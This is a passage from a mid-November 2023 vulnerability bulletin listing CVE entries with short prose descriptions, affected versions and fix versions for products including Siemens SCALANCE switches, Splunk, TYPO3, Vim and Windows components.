(All versions < V4.5), SCALANCE XC224-4C G EEC (All versions < V4.5), SCALANCE XF204 (All versions < V4.5), SCALANCE XF204 DNA (All versions < V4.5), SCALANCE XF204-2BA (All versions < V4.5), SCALANCE XF204-2BA DNA (All versions < V4.5), SCALANCE XP208 (All versions < V4.5), SCALANCE XP208 (Ethernet/IP) (All versions < V4.5), SCALANCE XP208EEC (All versions < V4.5), SCALANCE XP208PoE EEC (All versions < V4.5), SCALANCE XP216 (All versions < V4.5), SCALANCE XP216 (Ethernet/IP) (All versions < V4.5), SCALANCE XP216EEC (All versions < V4.5), SCALANCE XP216POE EEC (All versions < V4.5), SCALANCE XR324WG (24 x FE, AC 230V) (All versions < V4.5), SCALANCE XR324WG (24 X FE, DC 24V) (All versions < V4.5), SCALANCE XR326-2C PoE WG (All versions < V4.5), SCALANCE XR326-2C PoE WG (without UL) (All versions < V4.5), SCALANCE XR328-4C WG (24XFE, 4XGE, 24V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE, 4xGE,DC24V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE,4xGE,AC230V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE,4xGE,AC230V) (All versions < V4.5), SCALANCE XR328-4C WG (28xGE, AC 230V) (All versions < V4.5), SCALANCE XR328-4C WG (28xGE, DC 24V) (All versions < V4.5), SIPLUS NET SCALANCE XC206-2 (All versions < V4.5), SIPLUS NET SCALANCE XC206-2SFP (All versions < V4.5), SIPLUS NET SCALANCE XC208 (All versions < V4.5), SIPLUS NET SCALANCE XC216-4C (All versions < V4.5). Affected devices can be configured to send emails when certain events occur on the device. When presented with an invalid response from the SMTP server, the device triggers an error that disrupts email sending. An attacker with access to the network can use this to do disable notification of users when certain events occur. 2023-11-14 not yet calculated CVE-2023-44322
siemens — multiple_products A vulnerability has been identified in SCALANCE XB205-3 (SC, PN) (All versions < V4.5), SCALANCE XB205-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB205-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB205-3 (ST, PN) (All versions < V4.5), SCALANCE XB205-3LD (SC, E/IP) (All versions < V4.5), SCALANCE XB205-3LD (SC, PN) (All versions < V4.5), SCALANCE XB208 (E/IP) (All versions < V4.5), SCALANCE XB208 (PN) (All versions < V4.5), SCALANCE XB213-3 (SC, E/IP) (All versions < V4.5), SCALANCE XB213-3 (SC, PN) (All versions < V4.5), SCALANCE XB213-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB213-3 (ST, PN) (All versions < V4.5), SCALANCE XB213-3LD (SC, E/IP) (All versions < V4.5), SCALANCE XB213-3LD (SC, PN) (All versions < V4.5), SCALANCE XB216 (E/IP) (All versions < V4.5), SCALANCE XB216 (PN) (All versions < V4.5), SCALANCE XC206-2 (SC) (All versions < V4.5), SCALANCE XC206-2 (ST/BFOC) (All versions < V4.5), SCALANCE XC206-2G PoE (All versions < V4.5), SCALANCE XC206-2G PoE (54 V DC) (All versions < V4.5), SCALANCE XC206-2G PoE EEC (54 V DC) (All versions < V4.5), SCALANCE XC206-2SFP (All versions < V4.5), SCALANCE XC206-2SFP EEC (All versions < V4.5), SCALANCE XC206-2SFP G (All versions < V4.5), SCALANCE XC206-2SFP G (EIP DEF.) (All versions < V4.5), SCALANCE XC206-2SFP G EEC (All versions < V4.5), SCALANCE XC208 (All versions < V4.5), SCALANCE XC208EEC (All versions < V4.5), SCALANCE XC208G (All versions < V4.5), SCALANCE XC208G (EIP def.) (All versions < V4.5), SCALANCE XC208G EEC (All versions < V4.5), SCALANCE XC208G PoE (All versions < V4.5), SCALANCE XC208G PoE (54 V DC) (All versions < V4.5), SCALANCE XC216 (All versions < V4.5), SCALANCE XC216-3G PoE (All versions < V4.5), SCALANCE XC216-3G PoE (54 V DC) (All versions < V4.5), SCALANCE XC216-4C (All versions < V4.5), SCALANCE XC216-4C G (All versions < V4.5), SCALANCE XC216-4C G (EIP Def.) (All versions < V4.5), SCALANCE XC216-4C G EEC (All versions < V4.5), SCALANCE XC216EEC (All versions < V4.5), SCALANCE XC224 (All versions < V4.5), SCALANCE XC224-4C G (All versions < V4.5), SCALANCE XC224-4C G (EIP Def.) (All versions < V4.5), SCALANCE XC224-4C G EEC (All versions < V4.5), SCALANCE XF204 (All versions < V4.5), SCALANCE XF204 DNA (All versions < V4.5), SCALANCE XF204-2BA (All versions < V4.5), SCALANCE XF204-2BA DNA (All versions < V4.5), SCALANCE XP208 (All versions < V4.5), SCALANCE XP208 (Ethernet/IP) (All versions < V4.5), SCALANCE XP208EEC (All versions < V4.5), SCALANCE XP208PoE EEC (All versions < V4.5), SCALANCE XP216 (All versions < V4.5), SCALANCE XP216 (Ethernet/IP) (All versions < V4.5), SCALANCE XP216EEC (All versions < V4.5), SCALANCE XP216POE EEC (All versions < V4.5), SCALANCE XR324WG (24 x FE, AC 230V) (All versions < V4.5), SCALANCE XR324WG (24 X FE, DC 24V) (All versions < V4.5), SCALANCE XR326-2C PoE WG (All versions < V4.5), SCALANCE XR326-2C PoE WG (without UL) (All versions < V4.5), SCALANCE XR328-4C WG (24XFE, 4XGE, 24V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE, 4xGE,DC24V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE,4xGE,AC230V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE,4xGE,AC230V) (All versions < V4.5), SCALANCE XR328-4C WG (28xGE, AC 230V) (All versions < V4.5), SCALANCE XR328-4C WG (28xGE, DC 24V) (All versions < V4.5), SIPLUS NET SCALANCE XC206-2 (All versions < V4.5), SIPLUS NET SCALANCE XC206-2SFP (All versions < V4.5), SIPLUS NET SCALANCE XC208 (All versions < V4.5), SIPLUS NET SCALANCE XC216-4C (All versions < V4.5). Affected devices do not properly sanitize an input field. This could allow an authenticated remote attacker with administrative privileges to inject code or spawn a system root shell. Follow-up of CVE-2022-36323. 2023-11-14 not yet calculated CVE-2023-44373
siemens — multiple_products A vulnerability has been identified in SCALANCE XB205-3 (SC, PN) (All versions < V4.5), SCALANCE XB205-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB205-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB205-3 (ST, PN) (All versions < V4.5), SCALANCE XB205-3LD (SC, E/IP) (All versions < V4.5), SCALANCE XB205-3LD (SC, PN) (All versions < V4.5), SCALANCE XB208 (E/IP) (All versions < V4.5), SCALANCE XB208 (PN) (All versions < V4.5), SCALANCE XB213-3 (SC, E/IP) (All versions < V4.5), SCALANCE XB213-3 (SC, PN) (All versions < V4.5), SCALANCE XB213-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB213-3 (ST, PN) (All versions < V4.5), SCALANCE XB213-3LD (SC, E/IP) (All versions < V4.5), SCALANCE XB213-3LD (SC, PN) (All versions < V4.5), SCALANCE XB216 (E/IP) (All versions < V4.5), SCALANCE XB216 (PN) (All versions < V4.5), SCALANCE XC206-2 (SC) (All versions < V4.5), SCALANCE XC206-2 (ST/BFOC) (All versions < V4.5), SCALANCE XC206-2G PoE (All versions < V4.5), SCALANCE XC206-2G PoE (54 V DC) (All versions < V4.5), SCALANCE XC206-2G PoE EEC (54 V DC) (All versions < V4.5), SCALANCE XC206-2SFP (All versions < V4.5), SCALANCE XC206-2SFP EEC (All versions < V4.5), SCALANCE XC206-2SFP G (All versions < V4.5), SCALANCE XC206-2SFP G (EIP DEF.) (All versions < V4.5), SCALANCE XC206-2SFP G EEC (All versions < V4.5), SCALANCE XC208 (All versions < V4.5), SCALANCE XC208EEC (All versions < V4.5), SCALANCE XC208G (All versions < V4.5), SCALANCE XC208G (EIP def.) (All versions < V4.5), SCALANCE XC208G EEC (All versions < V4.5), SCALANCE XC208G PoE (All versions < V4.5), SCALANCE XC208G PoE (54 V DC) (All versions < V4.5), SCALANCE XC216 (All versions < V4.5), SCALANCE XC216-3G PoE (All versions < V4.5), SCALANCE XC216-3G PoE (54 V DC) (All versions < V4.5), SCALANCE XC216-4C (All versions < V4.5), SCALANCE XC216-4C G (All versions < V4.5), SCALANCE XC216-4C G (EIP Def.) (All versions < V4.5), SCALANCE XC216-4C G EEC (All versions < V4.5), SCALANCE XC216EEC (All versions < V4.5), SCALANCE XC224 (All versions < V4.5), SCALANCE XC224-4C G (All versions < V4.5), SCALANCE XC224-4C G (EIP Def.) (All versions < V4.5), SCALANCE XC224-4C G EEC (All versions < V4.5), SCALANCE XF204 (All versions < V4.5), SCALANCE XF204 DNA (All versions < V4.5), SCALANCE XF204-2BA (All versions < V4.5), SCALANCE XF204-2BA DNA (All versions < V4.5), SCALANCE XP208 (All versions < V4.5), SCALANCE XP208 (Ethernet/IP) (All versions < V4.5), SCALANCE XP208EEC (All versions < V4.5), SCALANCE XP208PoE EEC (All versions < V4.5), SCALANCE XP216 (All versions < V4.5), SCALANCE XP216 (Ethernet/IP) (All versions < V4.5), SCALANCE XP216EEC (All versions < V4.5), SCALANCE XP216POE EEC (All versions < V4.5), SCALANCE XR324WG (24 x FE, AC 230V) (All versions < V4.5), SCALANCE XR324WG (24 X FE, DC 24V) (All versions < V4.5), SCALANCE XR326-2C PoE WG (All versions < V4.5), SCALANCE XR326-2C PoE WG (without UL) (All versions < V4.5), SCALANCE XR328-4C WG (24XFE, 4XGE, 24V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE, 4xGE,DC24V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE,4xGE,AC230V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE,4xGE,AC230V) (All versions < V4.5), SCALANCE XR328-4C WG (28xGE, AC 230V) (All versions < V4.5), SCALANCE XR328-4C WG (28xGE, DC 24V) (All versions < V4.5), SIPLUS NET SCALANCE XC206-2 (All versions < V4.5), SIPLUS NET SCALANCE XC206-2SFP (All versions < V4.5), SIPLUS NET SCALANCE XC208 (All versions < V4.5), SIPLUS NET SCALANCE XC216-4C (All versions < V4.5). Affected devices allow to change the password, but insufficiently check which password is to be changed. With this an authenticated attacker could, under certain conditions, be able to change the password of another, potential admin user allowing her to escalate her privileges. 2023-11-14 not yet calculated CVE-2023-44374
siemens — multiple_products A vulnerability has been identified in Mendix Applications using Mendix 10 (All versions < V10.4.0), Mendix Applications using Mendix 7 (All versions < V7.23.37), Mendix Applications using Mendix 8 (All versions < V8.18.27), Mendix Applications using Mendix 9 (All versions < V9.24.10). A capture-replay flaw in the platform could have an impact to apps built with the platform, if certain preconditions are met that depend on the app’s model and access control design. This could allow authenticated attackers to access or modify objects without proper authorization, or escalate privileges in the context of the vulnerable app. 2023-11-14 not yet calculated CVE-2023-45794
siemens — multiple_products
 
A vulnerability has been identified in SCALANCE XB205-3 (SC, PN) (All versions < V4.5), SCALANCE XB205-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB205-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB205-3 (ST, PN) (All versions < V4.5), SCALANCE XB205-3LD (SC, E/IP) (All versions < V4.5), SCALANCE XB205-3LD (SC, PN) (All versions < V4.5), SCALANCE XB208 (E/IP) (All versions < V4.5), SCALANCE XB208 (PN) (All versions < V4.5), SCALANCE XB213-3 (SC, E/IP) (All versions < V4.5), SCALANCE XB213-3 (SC, PN) (All versions < V4.5), SCALANCE XB213-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB213-3 (ST, PN) (All versions < V4.5), SCALANCE XB213-3LD (SC, E/IP) (All versions < V4.5), SCALANCE XB213-3LD (SC, PN) (All versions < V4.5), SCALANCE XB216 (E/IP) (All versions < V4.5), SCALANCE XB216 (PN) (All versions < V4.5), SCALANCE XC206-2 (SC) (All versions < V4.5), SCALANCE XC206-2 (ST/BFOC) (All versions < V4.5), SCALANCE XC206-2G PoE (All versions < V4.5), SCALANCE XC206-2G PoE (54 V DC) (All versions < V4.5), SCALANCE XC206-2G PoE EEC (54 V DC) (All versions < V4.5), SCALANCE XC206-2SFP (All versions < V4.5), SCALANCE XC206-2SFP EEC (All versions < V4.5), SCALANCE XC206-2SFP G (All versions < V4.5), SCALANCE XC206-2SFP G (EIP DEF.) (All versions < V4.5), SCALANCE XC206-2SFP G EEC (All versions < V4.5), SCALANCE XC208 (All versions < V4.5), SCALANCE XC208EEC (All versions < V4.5), SCALANCE XC208G (All versions < V4.5), SCALANCE XC208G (EIP def.) (All versions < V4.5), SCALANCE XC208G EEC (All versions < V4.5), SCALANCE XC208G PoE (All versions < V4.5), SCALANCE XC208G PoE (54 V DC) (All versions < V4.5), SCALANCE XC216 (All versions < V4.5), SCALANCE XC216-3G PoE (All versions < V4.5), SCALANCE XC216-3G PoE (54 V DC) (All versions < V4.5), SCALANCE XC216-4C (All versions < V4.5), SCALANCE XC216-4C G (All versions < V4.5), SCALANCE XC216-4C G (EIP Def.) (All versions < V4.5), SCALANCE XC216-4C G EEC (All versions < V4.5), SCALANCE XC216EEC (All versions < V4.5), SCALANCE XC224 (All versions < V4.5), SCALANCE XC224-4C G (All versions < V4.5), SCALANCE XC224-4C G (EIP Def.) (All versions < V4.5), SCALANCE XC224-4C G EEC (All versions < V4.5), SCALANCE XF204 (All versions < V4.5), SCALANCE XF204 DNA (All versions < V4.5), SCALANCE XF204-2BA (All versions < V4.5), SCALANCE XF204-2BA DNA (All versions < V4.5), SCALANCE XP208 (All versions < V4.5), SCALANCE XP208 (Ethernet/IP) (All versions < V4.5), SCALANCE XP208EEC (All versions < V4.5), SCALANCE XP208PoE EEC (All versions < V4.5), SCALANCE XP216 (All versions < V4.5), SCALANCE XP216 (Ethernet/IP) (All versions < V4.5), SCALANCE XP216EEC (All versions < V4.5), SCALANCE XP216POE EEC (All versions < V4.5), SCALANCE XR324WG (24 x FE, AC 230V) (All versions < V4.5), SCALANCE XR324WG (24 X FE, DC 24V) (All versions < V4.5), SCALANCE XR326-2C PoE WG (All versions < V4.5), SCALANCE XR326-2C PoE WG (without UL) (All versions < V4.5), SCALANCE XR328-4C WG (24XFE, 4XGE, 24V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE, 4xGE,DC24V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE,4xGE,AC230V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE,4xGE,AC230V) (All versions < V4.5), SCALANCE XR328-4C WG (28xGE, AC 230V) (All versions < V4.5), SCALANCE XR328-4C WG (28xGE, DC 24V) (All versions < V4.5), SIPLUS NET SCALANCE XC206-2 (All versions < V4.5), SIPLUS NET SCALANCE XC206-2SFP (All versions < V4.5), SIPLUS NET SCALANCE XC208 (All versions < V4.5), SIPLUS NET SCALANCE XC216-4C (All versions < V4.5). Affected devices use a hardcoded key to obfuscate the configuration backup that an administrator can export from the device. This could allow an authenticated attacker with administrative privileges or an attacker that obtains a configuration backup to extract configuration information from the exported file. 2023-11-14 not yet calculated CVE-2023-44318
siemens — opc_ua_modelling_editor A vulnerability has been identified in Siemens OPC UA Modelling Editor (SiOME) (All versions < V2.8). Affected products suffer from a XML external entity (XXE) injection vulnerability. This vulnerability could allow an attacker to interfere with an application’s processing of XML data and read arbitrary files in the system. 2023-11-14 not yet calculated CVE-2023-46590
siemens — simatic_pcs_neo A vulnerability has been identified in SIMATIC PCS neo (All versions < V4.1). The PUD Manager of affected products does not properly authenticate users in the PUD Manager web service. This could allow an unauthenticated adjacent attacker to generate a privileged token and upload additional documents. 2023-11-14 not yet calculated CVE-2023-46096
siemens — simatic_pcs_neo A vulnerability has been identified in SIMATIC PCS neo (All versions < V4.1). The PUD Manager of affected products does not properly neutralize user provided inputs. This could allow an authenticated adjacent attacker to execute SQL statements in the underlying database. 2023-11-14 not yet calculated CVE-2023-46097
siemens — simatic_pcs_neo A vulnerability has been identified in SIMATIC PCS neo (All versions < V4.1). When accessing the Information Server from affected products, the products use an overly permissive CORS policy. This could allow an attacker to trick a legitimate user to trigger unwanted behavior. 2023-11-14 not yet calculated CVE-2023-46098
siemens — simatic_pcs_neo A vulnerability has been identified in SIMATIC PCS neo (All versions < V4.1). There is a stored cross-site scripting vulnerability in the Administration Console of the affected product, that could allow an attacker with high privileges to inject Javascript code into the application that is later executed by another legitimate user. 2023-11-14 not yet calculated CVE-2023-46099
simple_crud_functionality — simple_crud_functionality
 
SQL Injection vulnerability in add.php in Simple CRUD Functionality v1.0 allows attackers to run arbitrary SQL commands via the ‘title’ parameter. 2023-11-17 not yet calculated CVE-2023-48078
splunk_enterprise — splunk_enterprise In Splunk Enterprise versions below 9.0.7 and 9.1.2, ineffective escaping in the “Show syntax Highlighted” feature can result in the execution of unauthorized code in a user’s web browser. 2023-11-16 not yet calculated CVE-2023-46213
splunk_enterprise — splunk_enterprise In Splunk Enterprise versions below 9.0.7 and 9.1.2, Splunk Enterprise does not safely sanitize extensible stylesheet language transformations (XSLT) that users supply. This means that an attacker can upload malicious XSLT which can result in remote code execution on the Splunk Enterprise instance. 2023-11-16 not yet calculated CVE-2023-46214
statamic_cms — statamic_cms
 
Guest Entries is a php library which allows users to create, update & delete entries from the front-end of a site. In affected versions the file uploads feature did not prevent the upload of PHP files. This may lead to code execution on the server by authenticated users. This vulnerability is fixed in v3.1.2. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-13 not yet calculated CVE-2023-47621
 
statamic_cms — statamic_cms
 
Statamic is a flat-first, Laravel + Git powered CMS designed for building websites. In affected versions certain additional PHP files crafted to look like images may be uploaded regardless of mime type validation rules. This affects front-end forms using the “Forms” feature, and asset upload fields in the control panel. Malicious users could leverage this vulnerability to upload and execute code. This issue has been patched in versions 3.4.14 and 4.34.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-14 not yet calculated CVE-2023-48217
 
superagi — superagi
 
SuperAGI v0.0.13 was discovered to use a hardcoded key for encryption operations. This vulnerability can lead to the disclosure of information and communications. 2023-11-16 not yet calculated CVE-2023-48055
tenda — ax1803
 
Buffer Overflow vulnerability in Tenda AX1803 v1.0.0.1_2994 and earlier allows attackers to run arbitrary code via /goform/SetOnlineDevName. 2023-11-14 not yet calculated CVE-2022-45781
terramaster_technocology_co.,_ltd. — terramaster
 
Directory Traversal vulnerability in TerraMaster v.s1.0 through v.2.295 allows a remote attacker to obtain sensitive information via a crafted GET request. 2023-11-17 not yet calculated CVE-2023-48185
 
tibco_software_inc. — tibco_ebx
 
The Web Application component of TIBCO Software Inc.’s TIBCO EBX and TIBCO Product and Service Catalog powered by TIBCO EBX contains an easily exploitable vulnerability that allows a low privileged attacker with network access to execute a stored XSS on the affected system. Affected releases are TIBCO Software Inc.’s TIBCO EBX: versions 5.9.22 and below, versions 6.0.13 and below and TIBCO Product and Service Catalog powered by TIBCO EBX: versions 5.0.0 and below. 2023-11-14 not yet calculated CVE-2023-26222
tinymce — tinymce
 
TinyMCE is an open source rich text editor. A mutation cross-site scripting (mXSS) vulnerability was discovered in TinyMCE’s core undo/redo functionality and other APIs and plugins. Text nodes within specific parents are not escaped upon serialization according to the HTML standard. If such text nodes contain a special character reserved as an internal marker, they can be combined with other HTML patterns to form malicious snippets. These snippets pass the initial sanitization layer when the content is parsed into the editor body but can trigger XSS when the special internal marker is removed from the content and re-parsed. his vulnerability has been patched in TinyMCE versions 6.7.3 and 5.10.9. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-15 not yet calculated CVE-2023-48219

 

trellix — epolicy_orchestrator
 
A Cross Site Request Forgery vulnerability in ePolicy Orchestrator prior to 5.10.0 CP1 Update 2 allows a remote low privilege user to successfully add a new user with administrator privileges to the ePO server. This impacts the dashboard area of the user interface. To exploit this the attacker must change the HTTP payload post submission, prior to it reaching the ePO server. 2023-11-17 not yet calculated CVE-2023-5444
trellix — epolicy_orchestrator
 
An open redirect vulnerability in ePolicy Orchestrator prior to 5.10.0 CP1 Update 2, allows a remote low privileged user to modify the URL parameter for the purpose of redirecting URL request(s) to a malicious site. This impacts the dashboard area of the user interface. A user would need to be logged into ePO to trigger this vulnerability. To exploit this the attacker must change the HTTP payload post submission, prior to it reaching the ePO server. 2023-11-17 not yet calculated CVE-2023-5445
trellix — getsusp
 
An Improper Privilege Management vulnerability in Trellix GetSusp prior to version 5.0.0.27 allows a local, low privilege attacker to gain access to files that usually require a higher privilege level. This is caused by GetSusp not correctly protecting a directory that it creates during execution, allowing an attacker to take over file handles used by GetSusp. As this requires high privileges, the attacker gains elevated permissions. The file handles are opened as read-only. 2023-11-16 not yet calculated CVE-2023-6119
typo3 — typo3 TYPO3 is an open source PHP based web content management system released under the GNU GPL. In affected versions DOM processing instructions are not handled correctly. This allows bypassing the cross-site scripting mechanism of typo3/html-sanitizer. This vulnerability has been addressed in versions 1.5.3 and 2.1.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-14 not yet calculated CVE-2023-47125

 

typo3 — typo3
 
TYPO3 is an open source PHP based web content management system released under the GNU GPL. In affected versions the login screen of the standalone install tool discloses the full path of the transient data directory (e.g. /var/www/html/var/transient/). This applies to composer-based scenarios only – “classic” non-composer installations are not affected. This issue has been addressed in version 12.4.8. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-14 not yet calculated CVE-2023-47126

 

typo3 — typo3
 
TYPO3 is an open source PHP based web content management system released under the GNU GPL. In typo3 installations there are always at least two different sites. E.g., first.example.org and second.example.com. In affected versions a session cookie generated for the first site can be reused on the second site without requiring additional authentication. This vulnerability has been addressed in versions 8.7.55, 9.5.44, 10.4.41, 11.5.33, and 12.4.8. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-14 not yet calculated CVE-2023-47127

 

vantage6 — vantage6
 
vantage6 is a framework to manage and deploy privacy enhancing technologies like Federated Learning (FL) and Multi-Party Computation (MPC). In affected versions a node does not check if an image is allowed to run if a `parent_id` is set. A malicious party that breaches the server may modify it to set a fake `parent_id` and send a task of a non-whitelisted algorithm. The node will then execute it because the `parent_id` that is set prevents checks from being run. This impacts all servers that are breached by an expert user. This vulnerability has been patched in version 4.1.2. All users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-14 not yet calculated CVE-2023-47631

 

vertaai — vertaai/modeldb
 
An attacker can read any file on the filesystem on the server hosting ModelDB through an LFI in the artifact_path URL parameter. 2023-11-16 not yet calculated CVE-2023-6023
vim — vim
 
Vim is an open source command line text editor. When closing a window, vim may try to access already freed window structure. Exploitation beyond crashing the application has not been shown to be viable. This issue has been addressed in commit `25aabc2b` which has been included in release version 9.0.2106. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-16 not yet calculated CVE-2023-48231

 

vim — vim
 
Vim is an open source command line text editor. A floating point exception may occur when calculating the line offset for overlong lines and smooth scrolling is enabled and the cpo-settings include the ‘n’ flag. This may happen when a window border is present and when the wrapped line continues on the next physical line directly in the window border because the ‘cpo’ setting includes the ‘n’ flag. Only users with non-default settings are affected and the exception should only result in a crash. This issue has been addressed in commit `cb0b99f0` which has been included in release version 9.0.2107. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-16 not yet calculated CVE-2023-48232

 

vim — vim
 
Vim is an open source command line text editor. If the count after the :s command is larger than what fits into a (signed) long variable, abort with e_value_too_large. Impact is low, user interaction is required and a crash may not even happen in all situations. This issue has been addressed in commit `ac6378773` which has been included in release version 9.0.2108. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-16 not yet calculated CVE-2023-48233

 

vim — vim
 
Vim is an open source command line text editor. When getting the count for a normal mode z command, it may overflow for large counts given. Impact is low, user interaction is required, and a crash may not even happen in all situations. This issue has been addressed in commit `58f9befca1` which has been included in release version 9.0.2109. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-16 not yet calculated CVE-2023-48234

 

vim — vim
 
Vim is an open source command line text editor. When parsing relative ex addresses one may unintentionally cause an overflow. Ironically this happens in the existing overflow check, because the line number becomes negative and LONG_MAX – lnum will cause the overflow. Impact is low, user interaction is required, and a crash may not even happen in all situations. This issue has been addressed in commit `060623e` which has been included in release version 9.0.2110. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-16 not yet calculated CVE-2023-48235

 

vim — vim
 
Vim is an open source command line text editor. When using the z= command, the user may overflow the count with values larger than MAX_INT. Impact is low, user interaction is required, and a crash may not even happen in all situations. This vulnerability has been addressed in commit `73b2d379` which has been included in release version 9.0.2111. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-16 not yet calculated CVE-2023-48236

 

vim — vim
 
Vim is an open source command line text editor. In affected versions when shifting lines in operator pending mode and using a very large value, it may be possible to overflow the size of integer. Impact is low, user interaction is required, and a crash may not even happen in all situations. This issue has been addressed in commit `6bf131888` which has been included in version 9.0.2112. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-16 not yet calculated CVE-2023-48237

 

visual_studio_code — jupyter_extension Visual Studio Code Jupyter Extension Spoofing Vulnerability 2023-11-14 not yet calculated CVE-2023-36018
vmware — cloud_director_appliance VMware Cloud Director Appliance contains an authentication bypass vulnerability in case VMware Cloud Director Appliance was upgraded to 10.5 from an older version. On an upgraded version of VMware Cloud Director Appliance 10.5, a malicious actor with network access to the appliance can bypass login restrictions when authenticating on port 22 (ssh) or port 5480 (appliance management console) . This bypass is not present on port 443 (VCD provider and tenant login). On a new installation of VMware Cloud Director Appliance 10.5, the bypass is not present. VMware Cloud Director Appliance is impacted since it uses an affected version of sssd from the underlying Photon OS. The sssd issue is no longer present in versions of Photon OS that ship with sssd-2.8.1-11 or higher (Photon OS 3) or sssd-2.8.2-9 or higher (Photon OS 4 and 5). 2023-11-14 not yet calculated CVE-2023-34060

 

windows — authentication Windows Authentication Denial of Service Vulnerability 2023-11-14 not yet calculated CVE-2023-36046
windows — authentication Windows Authentication Elevation of Privilege Vulnerability 2023-11-14 not yet calculated CVE-2023-36047
windows — cloud_files_mini_filter_driver Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability 2023-11-14 not yet calculated CVE-2023-36036
windows — compressed_folder Windows Compressed Folder Remote Code Execution Vulnerability 2023-11-14 not yet calculated CVE-2023-36396
windows — deployment Windows Deployment Services Denial of Service Vulnerability 2023-11-14 not yet calculated CVE-2023-36395
windows — distributed_file_system Windows Distributed File System (DFS) Remote Code Execution Vulnerability 2023-11-14 not yet calculated CVE-2023-36425
windows — dwm_core_library Windows DWM Core Library Elevation of Privilege Vulnerability 2023-11-14 not yet calculated CVE-2023-36033
windows — hmac Windows HMAC Key Derivation Elevation of Privilege Vulnerability 2023-11-14 not yet calculated CVE-2023-36400
windows — hyper-v Windows Hyper-V Information Disclosure Vulnerability 2023-11-14 not yet calculated CVE-2023-36406
windows — hyper-v Windows Hyper-V Elevation of Privilege Vulnerability 2023-11-14 not yet calculated CVE-2023-36407
windows — hyper-v Windows Hyper-V Elevation of Privilege Vulnerability 2023-11-14 not yet calculated CVE-2023-36408
windows — kernel Windows Kernel Elevation of Privilege Vulnerability 2023-11-14 not yet calculated CVE-2023-36403
windows — kernel Windows Kernel Information Disclosure Vulnerability 2023-11-14 not yet calculated CVE-2023-36404
windows — kernel Windows Kernel Elevation of Privilege Vulnerability 2023-11-14 not yet calculated CVE-2023-36405
windows — ntfs Windows NTFS Information Disclosure Vulnerability 2023-11-14 not yet calculated CVE-2023-36398
windows — pragmatic_general_multicast Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability 2023-11-14 not yet calculated CVE-2023-36397
windows — scripting_engine_memory Windows Scripting Engine Memory Corruption Vulnerability 2023-11-14 not yet calculated CVE-2023-36017
windows — search_service Windows Search Service Elevation of Privilege Vulnerability 2023-11-14 not yet calculated CVE-2023-36394
windows — smartscreen_security_feature Windows SmartScreen Security Feature Bypass Vulnerability 2023-11-14 not yet calculated CVE-2023-36025
windows — user_interface_application Windows User Interface Application Core Remote Code Execution Vulnerability 2023-11-14 not yet calculated CVE-2023-36393
windows — common_log_file_system_driver Windows Common Log File System Driver Elevation of Privilege Vulnerability 2023-11-14 not yet calculated CVE-2023-36424
windows — hyper-v Windows Hyper-V Elevation of Privilege Vulnerability 2023-11-14 not yet calculated CVE-2023-36427
windows — installer Windows Installer Elevation of Privilege Vulnerability 2023-11-14 not yet calculated CVE-2023-36705
windows — storage Windows Storage Elevation of Privilege Vulnerability 2023-11-14 not yet calculated CVE-2023-36399
wireshark — wireshark
 
SSH dissector crash in Wireshark 4.0.0 to 4.0.10 allows denial of service via packet injection or crafted capture file 2023-11-16 not yet calculated CVE-2023-6174

 

withsecure — multiple_products
 
Certain WithSecure products allow a Denial of Service (DoS) in the antivirus engine when scanning a fuzzed PE32 file. This affects WithSecure Client Security 15, WithSecure Server Security 15, WithSecure Email and Server Security 15, WithSecure Elements Endpoint Protection 17 and later, WithSecure Client Security for Mac 15, WithSecure Elements Endpoint Protection for Mac 17 and later, WithSecure Linux Security 64 12.0, WithSecure Linux Protection 12.0, and WithSecure Atlant (formerly F-Secure Atlant) 15 and later. 2023-11-16 not yet calculated CVE-2023-47263
withsecure — multiple_products
 
Certain WithSecure products have a buffer over-read whereby processing certain fuzz file types may cause a denial of service (DoS). This affects WithSecure Client Security 15, WithSecure Server Security 15, WithSecure Email and Server Security 15, WithSecure Elements Endpoint Protection 17 and later, WithSecure Client Security for Mac 15, WithSecure Elements Endpoint Protection for Mac 17 and later, WithSecure Linux Security 64 12.0, WithSecure Linux Protection 12.0, and WithSecure Atlant (formerly F-Secure Atlant) 15 and later. 2023-11-16 not yet calculated CVE-2023-47264
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Himanshu Parashar Google Site Verification plugin using Meta Tag. This issue affects Google Site Verification plugin using Meta Tag: from n/a through 1.2. 2023-11-18 not yet calculated CVE-2023-32514
wordpress — wordpress Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in 10Web SEO by 10Web plugin <= 1.2.9 versions. 2023-11-16 not yet calculated CVE-2023-34375
